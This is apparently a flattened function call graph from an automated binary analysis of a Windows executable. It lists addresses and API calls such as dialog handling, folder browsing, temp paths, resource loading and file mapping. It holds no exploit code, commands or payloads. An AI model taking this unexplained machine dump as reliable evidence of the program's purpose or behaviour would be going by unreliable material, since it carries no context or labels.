std::exception_ptr::_Current_exception 28005->28006 28280 7ff6c3b9129c 49 API calls shared_ptr 28006->28280 28009 7ff6c3baad40 51 API calls 28008->28009 28010 7ff6c3bb27a9 OleInitialize 28009->28010 28011 7ff6c3bb27cf 28010->28011 28012 7ff6c3bb27d9 GdiplusStartup SHGetMalloc 28011->28012 28012->27489 28281 7ff6c3b937f4 28013->28281 28015 7ff6c3bb4631 28016 7ff6c3b937f4 47 API calls 28015->28016 28017 7ff6c3bb463e 28016->28017 28018 7ff6c3b937f4 47 API calls 28017->28018 28019 7ff6c3bb464b 28018->28019 28020 7ff6c3b937f4 47 API calls 28019->28020 28021 7ff6c3bb4274 28020->28021 28022 7ff6c3bb419c 28021->28022 28023 7ff6c3b92254 std::locale::global 47 API calls 28022->28023 28024 7ff6c3bb41ae 28023->28024 28025 7ff6c3b92254 std::locale::global 47 API calls 28024->28025 28026 7ff6c3bb41b7 28025->28026 28027 7ff6c3b92254 std::locale::global 47 API calls 28026->28027 28028 7ff6c3bb41c0 28027->28028 28030 7ff6c3baa571 GetModuleHandleW 28029->28030 28030->27919 28030->27920 28032 7ff6c3b91da4 std::exception_ptr::_Current_exception 49 API calls 28031->28032 28033 7ff6c3ba497c std::exception_ptr::_Current_exception 28032->28033 28034 7ff6c3ba497f std::exception_ptr::_Current_exception 28033->28034 28035 7ff6c3ba49df std::exception_ptr::_Current_exception 28033->28035 28034->28033 28034->28035 28037 7ff6c3ba4996 GetModuleFileNameW 28034->28037 28036 7ff6c3b920b4 49 API calls 28035->28036 28038 7ff6c3ba49f4 28036->28038 28037->28034 28038->27927 28040 7ff6c3ba3414 28039->28040 28109 7ff6c3b99768 28040->28109 28044 7ff6c3ba2a98 GetVersionExW 28043->28044 28045 7ff6c3ba2acb 28043->28045 28044->28045 28046 7ff6c3bb92f0 _log10_special 8 API calls 28045->28046 28047 7ff6c3ba2af8 28046->28047 28047->27952 28049 7ff6c3b91da4 std::exception_ptr::_Current_exception 49 API calls 28048->28049 28050 7ff6c3baad76 std::exception_ptr::_Current_exception 28049->28050 28051 7ff6c3baad8c GetSystemDirectoryW 28050->28051 28052 7ff6c3baad9b 28051->28052 28055 7ff6c3baae0b 28051->28055 28053 7ff6c3b926bc shared_ptr 2 API calls 28052->28053 28054 7ff6c3baada4 28053->28054 28056 7ff6c3b920b4 49 API calls 28054->28056 28057 7ff6c3bb92f0 _log10_special 8 API calls 28055->28057 28058 7ff6c3baadb1 std::exception_ptr::_Current_exception 28056->28058 28059 7ff6c3baae24 28057->28059 28060 7ff6c3b920b4 49 API calls 28058->28060 28059->27952 28061 7ff6c3baadc7 28060->28061 28133 7ff6c3ba38e4 28061->28133 28064 7ff6c3b92254 std::locale::global 47 API calls 28065 7ff6c3baade3 28064->28065 28066 7ff6c3b92254 std::locale::global 47 API calls 28065->28066 28067 7ff6c3baaded 28066->28067 28068 7ff6c3baadf6 LoadLibraryW 28067->28068 28069 7ff6c3b92254 std::locale::global 47 API calls 28068->28069 28069->28055 28071 7ff6c3b920c2 shared_ptr 28070->28071 28072 7ff6c3b91f88 49 API calls 28071->28072 28073 7ff6c3b920dd 28072->28073 28073->27952 28075 7ff6c3ba36c7 28074->28075 28183 7ff6c3ba4b8c 28075->28183 28077 7ff6c3ba4b87 28077->27952 28080 7ff6c3b921e4 shared_ptr 28078->28080 28079 7ff6c3b9221c shared_ptr 28079->27952 28080->28079 28189 7ff6c3b9218c 47 API calls 2 library calls 28080->28189 28190 7ff6c3b9128c 28082->28190 28084 7ff6c3ba162d GetFileAttributesW 28085 7ff6c3ba1678 28084->28085 28086 7ff6c3ba163d 28084->28086 28088 7ff6c3bb92f0 _log10_special 8 API calls 28085->28088 28087 7ff6c3b926bc shared_ptr RtlPcToFileHeader RaiseException 28086->28087 28089 7ff6c3ba1647 28087->28089 28090 7ff6c3ba1687 28088->28090 28091 7ff6c3ba4350 51 API calls 28089->28091 28090->27952 28092 7ff6c3ba1655 28091->28092 28093 7ff6c3ba166e 28092->28093 28095 7ff6c3ba1663 GetFileAttributesW 28092->28095 28094 7ff6c3b92254 std::locale::global 47 API calls 28093->28094 28094->28085 28095->28093 28096->27928 28098 7ff6c3ba9c4e shared_ptr 28097->28098 28099 7ff6c3ba9c7a 28098->28099 28100 7ff6c3b99794 49 API calls 28098->28100 28099->27971 28100->28098 28102 7ff6c3ba781c 28101->28102 28191 7ff6c3ba6614 28102->28191 28104 7ff6c3ba783f 28104->27990 28210 7ff6c3ba9f84 28105->28210 28108->27950 28112 7ff6c3b99804 28109->28112 28113 7ff6c3b99829 shared_ptr 28112->28113 28118 7ff6c3b96d94 28113->28118 28115 7ff6c3b99834 28123 7ff6c3b91f88 28115->28123 28117 7ff6c3b9977c 28117->27952 28119 7ff6c3b96d9e 28118->28119 28120 7ff6c3b96da3 28118->28120 28119->28115 28131 7ff6c3b96dac 49 API calls 28120->28131 28124 7ff6c3b91faa 28123->28124 28125 7ff6c3b9209d 28124->28125 28128 7ff6c3b91fb3 shared_ptr 28124->28128 28132 7ff6c3b91dc0 49 API calls std::_Xinvalid_argument 28125->28132 28129 7ff6c3b9250c shared_ptr 2 API calls 28128->28129 28130 7ff6c3b91fd8 shared_ptr 28128->28130 28129->28130 28130->28117 28146 7ff6c3b9a120 28133->28146 28135 7ff6c3ba3911 28137 7ff6c3ba3936 28135->28137 28158 7ff6c3ba38b8 49 API calls 28135->28158 28150 7ff6c3b91294 28137->28150 28139 7ff6c3ba3943 28154 7ff6c3b93be4 28139->28154 28142 7ff6c3b92254 std::locale::global 47 API calls 28143 7ff6c3ba395b 28142->28143 28144 7ff6c3bb92f0 _log10_special 8 API calls 28143->28144 28145 7ff6c3ba3968 28144->28145 28145->28064 28147 7ff6c3b9a12e shared_ptr 28146->28147 28159 7ff6c3b9a02c 28147->28159 28149 7ff6c3b9a145 28149->28135 28151 7ff6c3b912cc 28150->28151 28153 7ff6c3b91315 shared_ptr 28151->28153 28170 7ff6c3b91450 28151->28170 28153->28139 28156 7ff6c3b93bf5 shared_ptr 28154->28156 28155 7ff6c3b93c0e 28155->28142 28156->28155 28182 7ff6c3b91a50 49 API calls 28156->28182 28158->28137 28160 7ff6c3b9a050 28159->28160 28161 7ff6c3b9a119 28160->28161 28163 7ff6c3b9a059 shared_ptr 28160->28163 28169 7ff6c3b91dc0 49 API calls std::_Xinvalid_argument 28161->28169 28165 7ff6c3b9250c shared_ptr 2 API calls 28163->28165 28168 7ff6c3b9a07c shared_ptr 28163->28168 28165->28168 28168->28149 28171 7ff6c3b91478 28170->28171 28172 7ff6c3b91484 28171->28172 28173 7ff6c3b91565 28171->28173 28176 7ff6c3b9250c shared_ptr 2 API calls 28172->28176 28181 7ff6c3b91dc0 49 API calls std::_Xinvalid_argument 28173->28181 28178 7ff6c3b914a3 shared_ptr 28176->28178 28177 7ff6c3b91517 28177->28153 28178->28177 28180 7ff6c3b9218c 47 API calls 2 library calls 28178->28180 28184 7ff6c3b96d94 49 API calls 28183->28184 28185 7ff6c3ba4bba shared_ptr 28184->28185 28187 7ff6c3ba4bd9 28185->28187 28188 7ff6c3ba4fd8 49 API calls 2 library calls 28185->28188 28187->28077 28188->28187 28198 7ff6c3ba64b4 28191->28198 28194 7ff6c3ba6658 28196 7ff6c3bb92f0 _log10_special 8 API calls 28194->28196 28197 7ff6c3ba6671 28196->28197 28197->28104 28201 7ff6c3ba64dc std::exception_ptr::_Current_exception 28198->28201 28199 7ff6c3bb92f0 _log10_special 8 API calls 28200 7ff6c3ba657b 28199->28200 28200->28194 28204 7ff6c3ba6584 28200->28204 28203 7ff6c3ba6541 28201->28203 28208 7ff6c3bc5058 47 API calls 2 library calls 28201->28208 28203->28199 28205 7ff6c3ba659c std::exception_ptr::_Current_exception 28204->28205 28207 7ff6c3ba65d1 28205->28207 28209 7ff6c3bc5058 47 API calls 2 library calls 28205->28209 28207->28194 28208->28203 28209->28207 28211 7ff6c3b926bc shared_ptr 2 API calls 28210->28211 28212 7ff6c3ba9fb8 28211->28212 28226 7ff6c3ba9e80 28212->28226 28217 7ff6c3ba9fd6 28219 7ff6c3baa032 28217->28219 28234 7ff6c3b99a50 49 API calls shared_ptr 28217->28234 28235 7ff6c3baa384 28217->28235 28218 7ff6c3baa050 28221 7ff6c3b92254 std::locale::global 47 API calls 28218->28221 28219->28218 28238 7ff6c3b99a50 49 API calls shared_ptr 28219->28238 28222 7ff6c3baa05b 28221->28222 28224 7ff6c3bb92f0 _log10_special 8 API calls 28222->28224 28225 7ff6c3ba9f78 28224->28225 28225->27995 28227 7ff6c3ba9f3f 28226->28227 28229 7ff6c3ba9eae 28226->28229 28230 7ff6c3b9fe94 28227->28230 28228 7ff6c3b9156c 49 API calls 28228->28229 28229->28227 28229->28228 28231 7ff6c3b9fea6 shared_ptr 28230->28231 28239 7ff6c3b9fd70 28231->28239 28233 7ff6c3b9feb2 28233->28217 28234->28217 28250 7ff6c3ba1ce0 28235->28250 28238->28218 28240 7ff6c3b9fd93 28239->28240 28241 7ff6c3b9fe8b 28240->28241 28244 7ff6c3b9fd9c shared_ptr 28240->28244 28249 7ff6c3b91dc0 49 API calls std::_Xinvalid_argument 28241->28249 28243 7ff6c3b9fdc1 shared_ptr 28243->28233 28244->28243 28247 7ff6c3b9250c shared_ptr 2 API calls 28244->28247 28247->28243 28251 7ff6c3ba1cfd __swprintf_l 28250->28251 28254 7ff6c3bc4808 28251->28254 28255 7ff6c3bc4862 28254->28255 28256 7ff6c3bc4887 28255->28256 28257 7ff6c3bc48c3 28255->28257 28276 7ff6c3bc00c8 47 API calls 2 library calls 28256->28276 28277 7ff6c3bc2bc0 50 API calls _invalid_parameter_noinfo 28257->28277 28260 7ff6c3bc4a25 28263 7ff6c3bc4a3b 28260->28263 28279 7ff6c3bbfda8 47 API calls 2 library calls 28260->28279 28261 7ff6c3bc48b1 28261->28260 28278 7ff6c3bbfda8 47 API calls 2 library calls 28261->28278 28267 7ff6c3bb92f0 _log10_special 8 API calls 28263->28267 28264 7ff6c3bc7738 __free_lconv_num 11 API calls 28264->28261 28266 7ff6c3bc4970 28270 7ff6c3bc49a4 28266->28270 28271 7ff6c3bc4979 28266->28271 28269 7ff6c3ba1d1e 28267->28269 28268 7ff6c3bc495e 28268->28266 28268->28270 28268->28271 28272 7ff6c3bc49ca 28268->28272 28269->28217 28270->28264 28274 7ff6c3bc7738 __free_lconv_num 11 API calls 28271->28274 28272->28270 28273 7ff6c3bc49d4 28272->28273 28275 7ff6c3bc7738 __free_lconv_num 11 API calls 28273->28275 28274->28261 28275->28261 28276->28261 28277->28268 28278->28260 28279->28263 28282 7ff6c3b9380c shared_ptr 28281->28282 28284 7ff6c3b93819 28282->28284 28285 7ff6c3b921e4 47 API calls 2 library calls 28282->28285 28284->28015 28285->28284 28286 7ff6c3bb4930 28544 7ff6c3b928d8 28286->28544 28289 7ff6c3bb5434 28560 7ff6c3bb2bcc 28289->28560 28290 7ff6c3bb498c 28294 7ff6c3bb499c 28290->28294 28295 7ff6c3bb4a3d 28290->28295 28299 7ff6c3bb49a5 28290->28299 28292 7ff6c3bb92f0 _log10_special 8 API calls 28296 7ff6c3bb5923 28292->28296 28294->28299 28304 7ff6c3b926bc shared_ptr 2 API calls 28294->28304 28298 7ff6c3bb4af3 28295->28298 28301 7ff6c3bb4a57 28295->28301 28297 7ff6c3ba788c 47 API calls 28300 7ff6c3bb5446 28297->28300 28598 7ff6c3b927fc 50 API calls 2 library calls 28298->28598 28299->28292 28305 7ff6c3ba9f58 52 API calls 28300->28305 28306 7ff6c3ba788c 47 API calls 28301->28306 28303 7ff6c3bb4b06 28599 7ff6c3ba2d64 18 API calls _log10_special 28303->28599 28307 7ff6c3bb49b6 28304->28307 28308 7ff6c3bb545c 28305->28308 28309 7ff6c3bb4a75 SetDlgItemTextW 28306->28309 28310 7ff6c3ba788c 47 API calls 28307->28310 28311 7ff6c3b928b8 SetDlgItemTextW 28308->28311 28312 7ff6c3bb4a88 28309->28312 28314 7ff6c3bb49c1 28310->28314 28315 7ff6c3bb5472 28311->28315 28312->28299 28318 7ff6c3bb4aa2 GetMessageW 28312->28318 28550 7ff6c3b911c0 SHGetMalloc 28314->28550 28576 7ff6c3bb1fec FindResourceW 28315->28576 28318->28299 28321 7ff6c3bb4ac0 IsDialogMessageW 28318->28321 28321->28312 28324 7ff6c3bb4ad5 TranslateMessage DispatchMessageW 28321->28324 28322 7ff6c3bb49e7 28326 7ff6c3b92254 std::locale::global 47 API calls 28322->28326 28324->28312 28326->28299 28327 7ff6c3bb4bb5 28345 7ff6c3b92254 std::locale::global 47 API calls 28327->28345 28328 7ff6c3bb4bff GetDlgItem 28330 7ff6c3bb4c19 IsDlgButtonChecked IsDlgButtonChecked 28328->28330 28331 7ff6c3bb4c46 28328->28331 28329 7ff6c3bb54e7 SendDlgItemMessageW 28332 7ff6c3bb5524 IsDlgButtonChecked 28329->28332 28333 7ff6c3bb5533 28329->28333 28330->28331 28341 7ff6c3bb4c82 28331->28341 28342 7ff6c3bb4c58 28331->28342 28332->28333 28334 7ff6c3bb553f SendDlgItemMessageW 28333->28334 28335 7ff6c3bb5557 GetDlgItem IsDlgButtonChecked 28333->28335 28334->28335 28337 7ff6c3b926bc shared_ptr 2 API calls 28335->28337 28336 7ff6c3bb5484 28336->28329 28344 7ff6c3bb1fec 11 API calls 28336->28344 28339 7ff6c3bb5589 28337->28339 28338 7ff6c3bb4bf1 28338->28327 28340 7ff6c3ba788c 47 API calls 28338->28340 28343 7ff6c3ba4a5c 51 API calls 28339->28343 28347 7ff6c3bb5308 SetDlgItemTextW 28340->28347 28346 7ff6c3b9a120 49 API calls 28341->28346 28348 7ff6c3ba788c 47 API calls 28342->28348 28350 7ff6c3bb5594 GetDlgItem 28343->28350 28351 7ff6c3bb54b1 28344->28351 28352 7ff6c3bb4be3 28345->28352 28353 7ff6c3bb4c94 28346->28353 28354 7ff6c3bb531b 28347->28354 28355 7ff6c3bb4c62 28348->28355 28349 7ff6c3bb4b1b 28349->28327 28349->28328 28349->28338 28357 7ff6c3bb55b1 28350->28357 28707 7ff6c3bb1c3c GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28351->28707 28352->28299 28601 7ff6c3bb2b24 49 API calls 2 library calls 28353->28601 28363 7ff6c3ba788c 47 API calls 28354->28363 28356 7ff6c3b920b4 49 API calls 28355->28356 28360 7ff6c3bb4c6f 28356->28360 28595 7ff6c3b927dc 28357->28595 28600 7ff6c3bb30d4 24 API calls _log10_special 28360->28600 28361 7ff6c3bb54c0 28708 7ff6c3bb1c04 28361->28708 28362 7ff6c3bb4ca2 28375 7ff6c3ba788c 47 API calls 28362->28375 28367 7ff6c3bb533b 28363->28367 28368 7ff6c3b920b4 49 API calls 28367->28368 28372 7ff6c3bb5348 28368->28372 28369 7ff6c3bb4c7b 28377 7ff6c3b92254 std::locale::global 47 API calls 28369->28377 28370 7ff6c3bb55c4 28373 7ff6c3bb19f0 12 API calls 28370->28373 28376 7ff6c3bb53b6 28372->28376 28386 7ff6c3ba788c 47 API calls 28372->28386 28378 7ff6c3bb55cc 28373->28378 28380 7ff6c3bb4cbc 28375->28380 28381 7ff6c3ba788c 47 API calls 28376->28381 28382 7ff6c3bb4cf0 28377->28382 28383 7ff6c3bb3dfc 151 API calls 28378->28383 28379 7ff6c3bb54db 28379->28329 28384 7ff6c3ba9f58 52 API calls 28380->28384 28385 7ff6c3bb53c0 28381->28385 28403 7ff6c3bb4d03 28382->28403 28603 7ff6c3bb7598 50 API calls 3 library calls 28382->28603 28399 7ff6c3bb55db 28383->28399 28387 7ff6c3bb4ccc 28384->28387 28388 7ff6c3b920b4 49 API calls 28385->28388 28389 7ff6c3bb5361 28386->28389 28602 7ff6c3bb30d4 24 API calls _log10_special 28387->28602 28395 7ff6c3bb53d0 28388->28395 28396 7ff6c3b920b4 49 API calls 28389->28396 28391 7ff6c3bb4d30 28606 7ff6c3ba12c8 58 API calls 2 library calls 28391->28606 28393 7ff6c3bb4cd8 28397 7ff6c3b92254 std::locale::global 47 API calls 28393->28397 28407 7ff6c3b920b4 49 API calls 28395->28407 28409 7ff6c3bb5378 28396->28409 28397->28369 28398 7ff6c3bb4d40 28401 7ff6c3bb4d44 GetLastError 28398->28401 28402 7ff6c3bb4d55 28398->28402 28400 7ff6c3bb5611 28399->28400 28404 7ff6c3bb5abc 105 API calls 28399->28404 28405 7ff6c3ba788c 47 API calls 28400->28405 28408 7ff6c3bb564d 28400->28408 28401->28402 28607 7ff6c3ba4a40 SetCurrentDirectoryW 28402->28607 28403->28391 28604 7ff6c3ba15d4 53 API calls 28403->28604 28404->28400 28411 7ff6c3bb5624 SetDlgItemTextW 28405->28411 28413 7ff6c3bb53eb 28407->28413 28423 7ff6c3bb5abc 105 API calls 28408->28423 28441 7ff6c3bb5761 28408->28441 28414 7ff6c3b91294 49 API calls 28409->28414 28416 7ff6c3ba788c 47 API calls 28411->28416 28412 7ff6c3bb4d5f 28417 7ff6c3bb4d75 28412->28417 28418 7ff6c3bb4d66 GetLastError 28412->28418 28425 7ff6c3b92254 std::locale::global 47 API calls 28413->28425 28419 7ff6c3bb539a 28414->28419 28415 7ff6c3bb4d24 28415->28391 28605 7ff6c3bb2de8 12 API calls _log10_special 28415->28605 28421 7ff6c3bb563f SetDlgItemTextW 28416->28421 28422 7ff6c3bb4e18 28417->28422 28426 7ff6c3bb4e27 28417->28426 28427 7ff6c3bb4d8c GetTickCount 28417->28427 28418->28417 28424 7ff6c3b92254 std::locale::global 47 API calls 28419->28424 28421->28408 28422->28426 28446 7ff6c3bb51af 28422->28446 28462 7ff6c3bb566b 28423->28462 28428 7ff6c3bb53a8 28424->28428 28429 7ff6c3bb5416 28425->28429 28431 7ff6c3bb50d4 28426->28431 28434 7ff6c3ba4964 50 API calls 28426->28434 28608 7ff6c3b97198 49 API calls 28427->28608 28432 7ff6c3b92254 std::locale::global 47 API calls 28428->28432 28436 7ff6c3b92254 std::locale::global 47 API calls 28429->28436 28431->28327 28435 7ff6c3ba788c 47 API calls 28431->28435 28432->28376 28433 7ff6c3bb58c8 28440 7ff6c3bb58f0 28433->28440 28450 7ff6c3ba788c 47 API calls 28433->28450 28438 7ff6c3bb4e4a 28434->28438 28439 7ff6c3bb50e7 28435->28439 28443 7ff6c3bb5424 28436->28443 28437 7ff6c3bb4da1 28609 7ff6c3b96a6c 49 API calls shared_ptr 28437->28609 28621 7ff6c3ba871c 89 API calls std::exception_ptr::_Current_exception 28438->28621 28627 7ff6c3b9d1dc 49 API calls shared_ptr 28439->28627 28451 7ff6c3b92254 std::locale::global 47 API calls 28440->28451 28442 7ff6c3bb5860 28441->28442 28452 7ff6c3b926bc shared_ptr RtlPcToFileHeader RaiseException 28441->28452 28442->28433 28447 7ff6c3bb58c0 IsDlgButtonChecked 28442->28447 28453 7ff6c3b92254 std::locale::global 47 API calls 28443->28453 28445 7ff6c3bb56aa 28457 7ff6c3bb5753 28445->28457 28458 7ff6c3bb56b8 SetForegroundWindow 28445->28458 28456 7ff6c3ba788c 47 API calls 28446->28456 28447->28433 28459 7ff6c3bb58e1 SetDlgItemTextW 28450->28459 28460 7ff6c3bb58fa 28451->28460 28512 7ff6c3bb5799 28452->28512 28453->28327 28454 7ff6c3bb4db6 28455 7ff6c3b92254 std::locale::global 47 API calls 28454->28455 28461 7ff6c3bb4dc4 28455->28461 28463 7ff6c3bb51dd SetDlgItemTextW 28456->28463 28464 7ff6c3bb5abc 105 API calls 28457->28464 28458->28457 28465 7ff6c3bb56cd 28458->28465 28459->28440 28466 7ff6c3b92254 std::locale::global 47 API calls 28460->28466 28610 7ff6c3ba04a0 28461->28610 28462->28445 28469 7ff6c3bb07c4 62 API calls 28462->28469 28470 7ff6c3b926fc 28463->28470 28464->28441 28465->28457 28474 7ff6c3bb5abc 105 API calls 28465->28474 28466->28299 28468 7ff6c3bb5832 28480 7ff6c3bb07c4 62 API calls 28468->28480 28469->28445 28472 7ff6c3bb51fb SetDlgItemTextW GetDlgItem 28470->28472 28477 7ff6c3bb5226 28472->28477 28478 7ff6c3bb524c 28472->28478 28473 7ff6c3bb4e61 28484 7ff6c3ba9f58 52 API calls 28473->28484 28479 7ff6c3bb56e7 28474->28479 28475 7ff6c3bb5103 28485 7ff6c3b92254 std::locale::global 47 API calls 28475->28485 28489 7ff6c3bb5238 SetWindowLongPtrW 28477->28489 28628 7ff6c3bb5abc 28478->28628 28479->28457 28496 7ff6c3bb56f7 DialogBoxParamW 28479->28496 28486 7ff6c3bb5855 28480->28486 28481 7ff6c3ba788c 47 API calls 28481->28512 28482 7ff6c3bb4dea 28487 7ff6c3bb4e00 28482->28487 28488 7ff6c3bb4df1 GetLastError 28482->28488 28504 7ff6c3bb4e8e 28484->28504 28491 7ff6c3bb513a 28485->28491 28492 7ff6c3b92254 std::locale::global 47 API calls 28486->28492 28614 7ff6c3ba0534 28487->28614 28488->28487 28489->28478 28497 7ff6c3b92254 std::locale::global 47 API calls 28491->28497 28492->28442 28493 7ff6c3b920b4 49 API calls 28493->28512 28495 7ff6c3bb5abc 105 API calls 28499 7ff6c3bb5275 28495->28499 28496->28457 28500 7ff6c3bb571f 28496->28500 28501 7ff6c3bb5148 28497->28501 28706 7ff6c3bb3d18 215 API calls _log10_special 28499->28706 28506 7ff6c3b92254 std::locale::global 47 API calls 28500->28506 28507 7ff6c3ba788c 47 API calls 28501->28507 28513 7ff6c3bb4efe GetCommandLineW 28504->28513 28505 7ff6c3bb5284 28509 7ff6c3bb5abc 105 API calls 28505->28509 28510 7ff6c3bb573d 28506->28510 28511 7ff6c3bb5160 28507->28511 28508 7ff6c3b91294 49 API calls 28508->28512 28522 7ff6c3bb529c 28509->28522 28516 7ff6c3b92254 std::locale::global 47 API calls 28510->28516 28517 7ff6c3b920b4 49 API calls 28511->28517 28512->28468 28512->28481 28512->28493 28512->28508 28518 7ff6c3b92254 47 API calls std::locale::global 28512->28518 28514 7ff6c3bb4f20 28513->28514 28515 7ff6c3bb4f11 28513->28515 28623 7ff6c3bb3058 49 API calls _log10_special 28514->28623 28622 7ff6c3b9129c 49 API calls shared_ptr 28515->28622 28516->28299 28521 7ff6c3bb5170 28517->28521 28518->28512 28527 7ff6c3b92254 std::locale::global 47 API calls 28521->28527 28522->28338 28524 7ff6c3bb5abc 105 API calls 28522->28524 28523 7ff6c3bb4f31 28624 7ff6c3bb3058 49 API calls _log10_special 28523->28624 28524->28338 28526 7ff6c3bb4f42 28625 7ff6c3bb3058 49 API calls _log10_special 28526->28625 28529 7ff6c3bb5198 28527->28529 28531 7ff6c3b92254 std::locale::global 47 API calls 28529->28531 28530 7ff6c3bb4f53 28626 7ff6c3ba8864 89 API calls 28530->28626 28531->28327 28533 7ff6c3bb4f66 shared_ptr 28534 7ff6c3bb4f95 CreateFileMappingW 28533->28534 28535 7ff6c3bb4fc8 MapViewOfFile 28534->28535 28537 7ff6c3bb4ff7 std::exception_ptr::_Current_exception BuildCatchObjectHelperInternal 28534->28537 28535->28537 28536 7ff6c3bb5082 28538 7ff6c3bb50ae 28536->28538 28539 7ff6c3bb509b UnmapViewOfFile CloseHandle 28536->28539 28537->28536 28540 7ff6c3bb5070 Sleep 28537->28540 28541 7ff6c3b92254 std::locale::global 47 API calls 28538->28541 28539->28538 28540->28536 28540->28537 28542 7ff6c3bb50c6 28541->28542 28543 7ff6c3b92254 std::locale::global 47 API calls 28542->28543 28543->28431 28545 7ff6c3b928e1 28544->28545 28546 7ff6c3b928f8 28544->28546 28547 7ff6c3b928f6 28545->28547 28713 7ff6c3ba6960 28545->28713 28736 7ff6c3ba6dc0 28546->28736 28547->28289 28547->28290 28547->28299 28551 7ff6c3b911f5 SHBrowseForFolderW 28550->28551 28556 7ff6c3b91241 28550->28556 28552 7ff6c3b91236 28551->28552 28551->28556 28766 7ff6c3ba39b8 28552->28766 28554 7ff6c3bb92f0 _log10_special 8 API calls 28555 7ff6c3b9126e 28554->28555 28555->28322 28557 7ff6c3b928b8 28555->28557 28556->28554 28774 7ff6c3b9128c 28557->28774 28561 7ff6c3bb1c74 4 API calls 28560->28561 28562 7ff6c3bb2bfb 28561->28562 28563 7ff6c3bb2cf3 28562->28563 28564 7ff6c3bb2c03 GetWindow 28562->28564 28566 7ff6c3bb92f0 _log10_special 8 API calls 28563->28566 28565 7ff6c3bb2c1e 28564->28565 28565->28563 28568 7ff6c3bb2c2a GetClassNameW 28565->28568 28570 7ff6c3bb2cd2 GetWindow 28565->28570 28571 7ff6c3bb2c65 IsDlgButtonChecked 28565->28571 28573 7ff6c3bb1c04 4 API calls 28565->28573 28776 7ff6c3bb1c3c GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28565->28776 28777 7ff6c3bb1ce8 13 API calls 2 library calls 28565->28777 28567 7ff6c3bb2d03 28566->28567 28567->28297 28775 7ff6c3bacb10 CompareStringW 28568->28775 28570->28563 28570->28565 28571->28565 28571->28570 28573->28565 28575 7ff6c3bb2cb5 IsDlgButtonChecked 28575->28565 28577 7ff6c3bb212a 28576->28577 28578 7ff6c3bb2017 SizeofResource 28576->28578 28590 7ff6c3bb1c74 28577->28590 28578->28577 28579 7ff6c3bb2031 LoadResource 28578->28579 28579->28577 28580 7ff6c3bb204a LockResource 28579->28580 28580->28577 28581 7ff6c3bb205f GlobalAlloc 28580->28581 28581->28577 28582 7ff6c3bb207e GlobalLock 28581->28582 28583 7ff6c3bb2121 GlobalFree 28582->28583 28584 7ff6c3bb2090 BuildCatchObjectHelperInternal 28582->28584 28583->28577 28585 7ff6c3bb2118 GlobalUnlock 28584->28585 28778 7ff6c3bb276c 28584->28778 28585->28583 28587 7ff6c3bb2104 28587->28585 28588 7ff6c3bb20c2 28588->28585 28588->28587 28783 7ff6c3bb25c0 28588->28783 28591 7ff6c3bb1c04 4 API calls 28590->28591 28592 7ff6c3bb1c82 28591->28592 28594 7ff6c3bb1c91 28592->28594 28789 7ff6c3bb1c3c GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28592->28789 28594->28336 28790 7ff6c3b9128c 28595->28790 28598->28303 28599->28349 28600->28369 28601->28362 28602->28393 28603->28403 28604->28415 28605->28391 28606->28398 28607->28412 28608->28437 28609->28454 28611 7ff6c3b926bc shared_ptr 2 API calls 28610->28611 28612 7ff6c3ba04bc 28611->28612 28613 7ff6c3ba07a8 53 API calls 3 library calls 28612->28613 28613->28482 28615 7ff6c3ba054e 28614->28615 28616 7ff6c3ba055f 28614->28616 28615->28616 28617 7ff6c3ba0561 28615->28617 28618 7ff6c3ba055a 28615->28618 28807 7ff6c3ba0910 28617->28807 28791 7ff6c3ba0970 28618->28791 28621->28473 28623->28523 28624->28526 28625->28530 28626->28533 28627->28475 28629 7ff6c3b926bc shared_ptr 2 API calls 28628->28629 28671 7ff6c3bb5b1a shared_ptr std::exception_ptr::_Current_exception 28629->28671 28631 7ff6c3bb6d3e 28632 7ff6c3b92254 std::locale::global 47 API calls 28631->28632 28633 7ff6c3bb6d4a 28632->28633 28634 7ff6c3bb92f0 _log10_special 8 API calls 28633->28634 28635 7ff6c3bb5264 28634->28635 28635->28495 28637 7ff6c3b9d15c 49 API calls 28637->28671 28639 7ff6c3b9d6e0 CompareStringW 28639->28671 28640 7ff6c3b91da4 std::exception_ptr::_Current_exception 49 API calls 28640->28671 28642 7ff6c3bb7374 49 API calls 28642->28671 28643 7ff6c3b927dc SetDlgItemTextW 28644 7ff6c3bb60e5 SetDlgItemTextW 28643->28644 28644->28671 28645 7ff6c3ba4a5c 51 API calls 28645->28671 28646 7ff6c3b926bc RtlPcToFileHeader RaiseException shared_ptr 28646->28671 28647 7ff6c3bb647e GetTempPathW 28647->28671 28648 7ff6c3ba38e4 49 API calls 28648->28671 28649 7ff6c3b9a120 49 API calls 28701 7ff6c3bb620f 28649->28701 28654 7ff6c3bc59dc 56 API calls 28654->28671 28655 7ff6c3b97198 49 API calls 28655->28671 28656 7ff6c3b99804 49 API calls 28656->28671 28658 7ff6c3ba4dc8 49 API calls 28658->28671 28660 7ff6c3b9fac0 49 API calls 28660->28671 28661 7ff6c3ba9d28 49 API calls 28661->28671 28662 7ff6c3b99768 49 API calls 28662->28671 28667 7ff6c3b937f4 47 API calls 28667->28671 28669 7ff6c3b927dc SetDlgItemTextW 28669->28671 28670 7ff6c3b926bc RtlPcToFileHeader RaiseException shared_ptr 28670->28701 28671->28631 28671->28637 28671->28639 28671->28640 28671->28642 28671->28643 28671->28645 28671->28646 28671->28647 28671->28648 28671->28654 28671->28655 28671->28656 28671->28658 28671->28660 28671->28661 28671->28662 28671->28667 28672 7ff6c3b920b4 49 API calls 28671->28672 28674 7ff6c3bb6084 IsDlgButtonChecked 28671->28674 28680 7ff6c3b928b8 SetDlgItemTextW 28671->28680 28681 7ff6c3bb60b9 IsDlgButtonChecked 28671->28681 28685 7ff6c3ba3f2c 55 API calls 28671->28685 28692 7ff6c3ba15d4 53 API calls 28671->28692 28693 7ff6c3b92254 47 API calls std::locale::global 28671->28693 28696 7ff6c3b91294 49 API calls 28671->28696 28697 7ff6c3b93be4 49 API calls 28671->28697 28698 7ff6c3ba38b8 49 API calls 28671->28698 28699 7ff6c3ba3400 49 API calls 28671->28699 28671->28701 28705 7ff6c3b9a120 49 API calls 28671->28705 28891 7ff6c3baa074 51 API calls std::exception_ptr::_Current_exception 28671->28891 28892 7ff6c3bb7804 49 API calls 2 library calls 28671->28892 28893 7ff6c3b9129c 49 API calls shared_ptr 28671->28893 28894 7ff6c3b9d120 49 API calls 28671->28894 28895 7ff6c3bb2eec 28671->28895 28913 7ff6c3ba4e30 49 API calls 28671->28913 28914 7ff6c3bb76ac 28671->28914 28944 7ff6c3ba1d5c RtlPcToFileHeader RaiseException shared_ptr 